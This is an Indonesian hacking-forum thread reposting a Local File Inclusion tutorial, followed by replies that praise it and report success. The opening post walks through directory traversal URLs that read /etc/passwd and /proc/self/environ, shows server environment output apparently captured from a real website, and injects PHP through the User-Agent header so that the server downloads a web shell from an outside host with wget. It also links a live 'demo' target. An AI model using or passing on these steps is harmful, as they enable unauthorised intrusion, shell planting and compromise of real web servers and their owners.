Page 1 of 1

Tutorial LFI dari PlanetWork Team

Posted: Mon Dec 26, 2011 7:55 pm
by poni
Tutorial ini bisa dijadikan referensi bagi anda yang ingin bereksplorasi lebih jauh dengan teknik Local File Inclusion. Tutor ini ditulis oleh rekan kita Conficker dari http://www.planetwork.web.id. berikut tutornya saya share tanpa mengubah isi.

mumpung ada waktu nulis postingan.
kali ini saya mencoba saya menulis artikel tentang injeksi lfi dengan Add-on yaitu User Agent Switcher 0.7.3
mungkin untuk penjelasan teknik nya sama kayak thread yang bang enda sajikan..

ok download aja dulu add on nya disini

Code: Select all

https://addons.mozilla.org/firefox/downloads/latest/59/addon-59-latest.xpi?src=search
seperti yang kita ketahui pada umumnya, kita harus menemukan dulu direktori utama dari server ini. teknik lama yg ampuh adalah dengan mencoba satu persatu, dan menaikan ke tingkat direktori diatasnya. contoh:

Code: Select all

http://localhost/buglfi.php?file=../etc/passwd%00 (contoh naik 1 directory)
bila gagal

Code: Select all

http://localhost/buglfi.php?file=../../etc/passwd%00
http://localhost/buglfi.php?file=../../../etc/passwd%00
http://localhost/buglfi.php?file=../../../../etc/passwd%00   terus naik sampai file /etc/passwd terinclude
contoh isi dari /etc/passwd

Code: Select all

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
bila menemui halaman berisi seperti itu, berarti sudah ketemu letak direktori root. misal :

Code: Select all

http://localhost/buglfi.php?file=../../../../../etc/passwd%00
kemudian kita tes include file environ

Code: Select all

http://localhost/buglfi.php?file=../../../../../proc/selv/environ%00
injek dan dapatkan output nya seperti ini.

Code: Select all

DOCUMENT_ROOT=/home/trafalg/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7HTTP_ACCEPT_ENCODING=gzip,   deflateHTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5HTTP_AUTHORIZATION=HTTP_CONNECTION=keep-aliveHTTP_COOKIE=uname=Linux+host97.hrwebservices.net+2.6.18-274.3.1.el5+%231+SMP+Tue+Sep+6+20%3A13%3A52+EDT+2011+x86_64+x86_64+x86_64+GNU%2F ​Linux;   id=uid%3D32593%28trafalg%29+gid%3D32596%28trafalg%29+groups%3D32596%28trafalg%29 ​ ;  sysctl=-;  c8dd27a241ad8723ed6693190a9aee42=2b8c6c3b3c130b64aca0649ed2f5f48eHTTP_HOST= ​trafalgarvillage.orgHTTP_USER_AGENT=Mozilla/5.0  (Windows NT 5.1; rv:8.0) Gecko/20100101  Firefox/8.0PATH=/bin:/usr/binQUERY_STRING
yerps langsung saja kita injek menggunakan user agent

jadi pertama harus setting dulu user agen, silahkan lihat gambar di bawah ini

Image

jadi intinya kalo kita memasukkan user agen dengan ikhy conficker, otomatis server akan mengetahui kalau user agen nya ada ikhy conficker

HTTP_USER_AGENT=ikhy conficker

dengan cara seperti itu, maka kita dapat memanipulasinya.

contohnya seperti pada gambar di atas, saya mencoba untuk menganti user agent nya dengan

Code: Select all

<?php system ('wget http://iki.do.am/new.txt -O version.php');?>
NB: http://iki.do.am/new.txt bisa di ganti dengan url injektor sobat sobat atau juga bisa memakai punyanya saya =))
jika sobat sudah mengisi user agen nya, coba refresh browser sobat.

apa yang terlihat ?

Code: Select all

DOCUMENT_ROOT=/home/trafalg/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7HTTP_ACCEPT_ENCODING=gzip,   deflateHTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5HTTP_AUTHORIZATION=HTTP_CACHE_CONTROL=max-age=0HTTP_CONNECTION=keep-aliveHTTP_COOKIE=uname=Linux+host97.hrwebservices.net+2.6.18-274.3.1.el5+%231+SMP+Tue+Sep+6+20%3A13%3A52+EDT+2011+x86_64+x86_64+x86_64+GNU%2F ​Linux;   id=uid%3D32593%28trafalg%29+gid%3D32596%28trafalg%29+groups%3D32596%28trafalg%29 ​;  sysctl=-; visits=0;  c8dd27a241ad8723ed6693190a9aee42=ed04777a6f00b9c5a49be8c7a22cb0f5HTTP_HOST= ​trafalgarvillage.orgHTTP_USER_AGENT=Saving  to 'new.txt'...                                                                                71.9 KB received
berarti shell sudah tersimpan di server tersebut

akewkewek

tinggal kita buka http://localhost/version.php

untuk demonya http://www.visuallab.it//index.php?optio...ontroller=
jadi seperti itulah salah 1 teknik lfi yang sering saya pakai.

jika ada kata yang masih kurang di mengerti sobat. silahkan bertanya

Re: Tutorial LFI dari PlanetWork Team

Posted: Mon Dec 26, 2011 9:59 pm
by j0ck3r
wiiyy..keren pak,Btw belom ada rencana buat update Xploit scannernya lagi??? :mrgreen:

Re: Tutorial LFI dari PlanetWork Team

Posted: Mon Dec 26, 2011 10:06 pm
by poni
j0ck3r : blm ada updatenya mas. klo dork bisa di edit sendiri.. OOT.. hahhaha

Re: Tutorial LFI dari PlanetWork Team

Posted: Mon Dec 26, 2011 10:08 pm
by j0ck3r
he..iya om,kalau dorknya kebanyakan saya edit sendiri,berkreasi..hehe
req buat tool semacam alballo dunk om... :D

Re: Tutorial LFI dari PlanetWork Team

Posted: Tue Jan 10, 2012 2:54 pm
by eNdA
thanks mas poni... semoga xcode tamba berkembang

Re: Tutorial LFI dari PlanetWork Team

Posted: Sat Jan 14, 2012 3:59 pm
by ono uin
Selain coba satu2 gak ada ya om??

Re: Tutorial LFI dari PlanetWork Team

Posted: Sun Mar 03, 2013 6:13 pm
by w3d4
masih lom nngerti di penanaman shell, apa itu bisa membuat jalur untuk upload file apapun ?
@$@#!

Re: Tutorial LFI dari PlanetWork Team

Posted: Thu Jun 06, 2013 12:44 pm
by lanuma
sudah sukses mas poni... tapi kok tampilannya putih ya???? :( :(